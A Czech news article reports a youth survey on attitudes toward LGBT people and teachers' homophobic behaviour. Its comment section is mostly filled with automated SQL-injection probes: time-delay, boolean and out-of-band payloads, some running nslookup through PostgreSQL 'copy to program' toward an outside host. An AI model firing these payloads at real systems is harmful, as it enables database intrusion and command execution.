reklama
cz / EN / esp

Co si myslí mladí o gayích, lesbách a trans lidech?

V loňském roce probíhal výzkum mezi studenty. Jak oni hodnotí své učitele?

reklama

Od března do prosince loňského roku studenti středních škol odpovídali na otázky týkající se jejich postoje k LGBT lidem. Součástí 29 otázek byly i dotazy na vyučující a jejich projevy ohledně LGBT problematiky. Druhá část průzkumu sestávala z rozhovorů s vyučujícími středních a základních škol. Rozhovory se týkaly témat, jakými jsou například LGBTQ studující ve škole, jejich postavení v kolektivu, coming out, zahrnutí informací o různých sexuálních a genderových identitách ve výuce a kurikulu, prevence homofobní šikany atd.


Celkem se průzkumu, který probíhal na sociálních sítích, zúčastnilo 1314 respondentů ve věku 14 – 23 let.

 

Postoje respondentů ke gayům a lesbám se ukázaly jako většinou pozitivní či tolerantní. Jen minimum respondentů mělo chuť těmto osobám nějak ublížit, mělo z nich strach nebo se domnívalo, že jsou nebezpeční. Ještě tolerantnější byli respondenti k bisexuálům, ti jim „vadili“ o něco méně. Přesto se část respondentů vyjádřila, že se ve společnosti gayů a leseb necítí dobře a že se k nim nechová stejně jako k heterosexuálům (průměrně okolo 10 % dotazovaných). Největší obavy a antipatie však u respondentů jednoznačně vzbuzovali transsexuální lidé – celá čtvrtina dotázaných by se v jejich společnosti necítila dobře a jedna pětina se domnívala, že nejsou stejní jako ostatní lidé.

 
Kromě hodnocení výroků o LGBT lidech mohli respondenti/ky svůj postoj k lesbám, gayům, transsexuálním a bisexuálním osobám ohodnotit přímo na škále „rozhodně pozitivní“ až „rozhodně negativní“. K lesbám, gayům a bisexuálům vyjádřily rozhodně či spíše pozitivní vztah celé tři čtvrtiny respondentů. Velká část zbylé třetiny zaujímala postoj neutrální, ryze negativní vztah k nim mělo jen asi 5 %. U trans osob byla ale situace odlišná – pozitivní postoj k nim mělo jen 55 % dotázaných. Čtvrtina je vnímala neutrálně, plných 19 % k nim však zaujalo postoj negativní.

 

Kompletní informace najdete na tomto odkazu http://proudem.cz/novinky/209-ceske-skoly-pod-lupou.html

 

Vtipy, urážky a zesměšňování LGBT osob ze strany vyučujících

 

Pozitivním zjištěním je, že tři čtvrtiny respondentů se nikdy nesetkaly se zesměšňováním konkrétního spolužáka/žákyně, ignorováním problematických situací LGBT spolužáků/žákyň a popíráním jejich existence ze strany učitele a že učitelé více než poloviny respondentů (57 %) nikdy nepoužili LGBT označení jako nadávku a ani s vtipy o LGBT se ze strany učitelů nikdy nesetkala necelá polovina vzorku (46 %). Na druhou stranu ale pětina respondentů slýchala z úst učitelů nadávky ve formě označení LGBT často a 7–8 % respondentů zažívalo často situace, při nichž byla učiteli popírána existence LGBT lidí nebo byla přehlížena jejich problémová situace ve společnosti. 6 % respondentů/ek také ve třídě často zažívalo zesměšňování LGBT spolužáka/žákyně učitelem. Tato čísla, přestože nejsou vysoká, rozhodně nejsou zanedbatelná – v absolutních číslech se jedná u každého z případů o zhruba 80–100 mladých lidí s negativními zkušenostmi s chováním vyučujících. Tato situace se přitom neomezuje jen na jeden typ školy, výsledky jsou podobné pro žáky základních škol, učilišť, odborných škol i gymnázií.

redakce, proud.cz, foto facebook.com, / 01.02.2016
reklama

Komentáře k článku

Vážení čtenáři, o vaše názory velmi stojíme. Chceme však, aby diskuse měly smysl. Proto vás prosíme, diskutujte slušně a k tématu článku. Příspěvky, které ve slušné a kultivované diskuzi nemají místo, mažeme.

Nový komentár

Mark 27.07.2019
Gay seznamka www.all4girl.com
jqyhtwwq 15.05.2018
1
jqyhtwwq 15.05.2018
1
jqyhtwwq 15.05.2018
1
jqyhtwwq 15.05.2018
1
jqyhtwwq 15.05.2018
1acuRnimNSGb1N
jqyhtwwq 15.05.2018
1acuRnimNSGb1N
1acuAIDxS2WOGS 15.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
993' 14.05.2018
1
bmepbqeq';copy (select '') to program 'nslookup dns.sqli.\039481.50-1827.50.f8115.\1.bxss.me 14.05.2018
1
'||UTL_INADDR.get_host_address('dns.'||'sqli.039481.50-1826.50.f8115.1.bxss'||'.me')||' 14.05.2018
1
WFN2VIow'));select pg_sleep(5.282); -- 14.05.2018
1
r9YOyfay');select pg_sleep(0); -- 14.05.2018
1
KgLSSRiY');select pg_sleep(5.282); -- 14.05.2018
1
kNjFCq7F';select pg_sleep(15.846); -- 14.05.2018
1
G4KWgIrJ'; waitfor delay '0:0:15.846' -- 14.05.2018
1
1 waitfor delay '0:0:10.564' -- 14.05.2018
1
(select(0)from(select(sleep(10.564)))v)/*'+(select(0)from(select(sleep(10.564)))v)+'"+(select(0)from(select(sleep(10.564)))v)+"*/ 14.05.2018
1
if(now()=sysdate(),sleep(10.564),0)/*'XOR(if(now()=sysdate(),sleep(10.564),0))OR'"XOR(if(now()=sysdate(),sleep(10.564),0))OR"*/ 14.05.2018
1
-1" OR 3*2>(0+5+693-693) -- 14.05.2018
1
-1" OR 3*2<(0+5+693-693) -- 14.05.2018
1
-1" OR 3+693-693-1=0+0+0+1 -- 14.05.2018
1
-1" OR 2+693-693-1=0+0+0+1 -- 14.05.2018
1
-1' OR 3*2>(0+5+682-682) or 'U5nTvrQm'=' 14.05.2018
1
-1' OR 3*2<(0+5+682-682) or 'U5nTvrQm'=' 14.05.2018
1
-1' OR 3+682-682-1=0+0+0+1 or 'U5nTvrQm'=' 14.05.2018
1
-1' OR 2+682-682-1=0+0+0+1 or 'U5nTvrQm'=' 14.05.2018
1
-1' OR 3*2>(0+5+122-122) -- 14.05.2018
1
-1' OR 3*2<(0+5+122-122) -- 14.05.2018
1
-1' OR 3+122-122-1=0+0+0+1 -- 14.05.2018
1
efagniuq 14.05.2018
1
-1' OR 2+122-122-1=0+0+0+1 -- 14.05.2018
1
-1 OR 3*2>(0+5+153-153) 14.05.2018
1
-1 OR 3*2<(0+5+153-153) 14.05.2018
1
-1 OR 3+153-153-1=0+0+0+1 14.05.2018
1
-1 OR 2+153-153-1=0+0+0+1 14.05.2018
1
-1 OR 3*2>(0+5+355-355) -- 14.05.2018
1
efagniuq 14.05.2018
1
-1 OR 3*2<(0+5+355-355) -- 14.05.2018
1
efagniuq 14.05.2018
1
efagniuq 14.05.2018
1
-1 OR 3+355-355-1=0+0+0+1 -- 14.05.2018
1
-1 OR 2+355-355-1=0+0+0+1 -- 14.05.2018
1
efagniuq 14.05.2018
1
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
efagniuq 14.05.2018
1
efagniuq 14.05.2018
1
efagniuq 14.05.2018
1
efagniuq 14.05.2018
1
efagniuq 14.05.2018
1
efagniuq 14.05.2018
1
efagniuq 14.05.2018
1
efagniuq 14.05.2018
1
efagniuq 14.05.2018
1
bmepbqeq 14.05.2018
51'
bmepbqeq 14.05.2018
1';copy (select '') to program 'nslookup dns.sqli.\039481.50-1781.50.f8115.\1.bxss.me
''"" 14.05.2018
1
bmepbqeq 14.05.2018
1;copy (select '') to program 'nslookup dns.sqli.\039481.50-1780.50.f8115.\1.bxss.me'
bmepbqeq 14.05.2018
'||UTL_INADDR.get_host_address('dns.'||'sqli.039481.50-1778.50.f8115.1.bxss'||'.me')||'
'" 14.05.2018
1
bmepbqeq 14.05.2018
1||UTL_INADDR.get_host_address('dns.'||'sqli.039481.50-1777.50.f8115.1.bxss'||'.me')
JyI= 14.05.2018
1
bmepbqeq 14.05.2018
u5UfTPvo'));select pg_sleep(11.562); --
@@tNxLM 14.05.2018
1
bmepbqeq 14.05.2018
VFTp2PNF');select pg_sleep(5.781); --
bmepbqeq 14.05.2018
SAwbNJzE';select pg_sleep(11.562); --
bmepbqeq 14.05.2018
goCvHD0B';select pg_sleep(5.781); --
1%2527%2522 14.05.2018
1
\ 14.05.2018
1
bmepbqeq 14.05.2018
-1));select pg_sleep(5.781); --
1'" 14.05.2018
1
bmepbqeq 14.05.2018
-1);select pg_sleep(5.781); --
bmepbqeq 14.05.2018
-1;select pg_sleep(17.343); --
efagniuq 14.05.2018
1
bmepbqeq 14.05.2018
LJWiuI6d'; waitfor delay '0:0:17.343' --
bmepbqeq 14.05.2018
1 waitfor delay '0:0:11.562' --
bmepbqeq 14.05.2018
-1); waitfor delay '0:0:17.343' --
bmepbqeq 14.05.2018
-1); waitfor delay '0:0:0' --
bmepbqeq 14.05.2018
-1); waitfor delay '0:0:5.781' --
bmepbqeq 14.05.2018
-1; waitfor delay '0:0:17.343' --
bmepbqeq 14.05.2018
(select(0)from(select(sleep(17.343)))v)/*'+(select(0)from(select(sleep(17.343)))v)+'"+(select(0)from(select(sleep(17.343)))v)+"*/
bmepbqeq 14.05.2018
if(now()=sysdate(),sleep(17.343),0)/*'XOR(if(now()=sysdate(),sleep(17.343),0))OR'"XOR(if(now()=sysdate(),sleep(17.343),0))OR"*/
bmepbqeq 14.05.2018
-1" OR 3*2>(0+5+260-260) --
bmepbqeq 14.05.2018
-1" OR 3*2<(0+5+260-260) --
bmepbqeq 14.05.2018
-1" OR 2+260-260-1=0+0+0+1 --
bmepbqeq 14.05.2018
-1" OR 3+260-260-1=0+0+0+1 --
bmepbqeq 14.05.2018
-1' OR 3*2>(0+5+747-747) or 'DTGx5zbf'='
bmepbqeq 14.05.2018
-1' OR 3+747-747-1=0+0+0+1 or 'DTGx5zbf'='
bmepbqeq 14.05.2018
-1' OR 3*2<(0+5+747-747) or 'DTGx5zbf'='
bmepbqeq 14.05.2018
-1' OR 2+747-747-1=0+0+0+1 or 'DTGx5zbf'='
efagniuq 14.05.2018
''""
bmepbqeq 14.05.2018
-1' OR 3*2>(0+5+477-477) --
bmepbqeq 14.05.2018
-1' OR 3*2<(0+5+477-477) --
efagniuq 14.05.2018
'"
bmepbqeq 14.05.2018
-1' OR 2+477-477-1=0+0+0+1 --
bmepbqeq 14.05.2018
-1' OR 3+477-477-1=0+0+0+1 --
efagniuq 14.05.2018
JyI=
bmepbqeq 14.05.2018
-1 OR 3*2>(0+5+59-59)
bmepbqeq 14.05.2018
-1 OR 3*2<(0+5+59-59)
bmepbqeq 14.05.2018
-1 OR 3+59-59-1=0+0+0+1
efagniuq 14.05.2018
@@5l9ue
bmepbqeq 14.05.2018
-1 OR 2+59-59-1=0+0+0+1
efagniuq 14.05.2018
1%2527%2522
efagniuq 14.05.2018
\
bmepbqeq 14.05.2018
-1 OR 3*2>(0+5+396-396) --
efagniuq 14.05.2018
1'"
efagniuq 14.05.2018
1
bmepbqeq 14.05.2018
-1 OR 3*2<(0+5+396-396) --
bmepbqeq 14.05.2018
-1 OR 3+396-396-1=0+0+0+1 --
bmepbqeq 14.05.2018
-1 OR 2+396-396-1=0+0+0+1 --
bmepbqeq 14.05.2018
1
bmepbqeq 14.05.2018
1
bvyrhgrb 13.05.2018
1
reklama

reklama

reklama


Najdete na FreshGayMag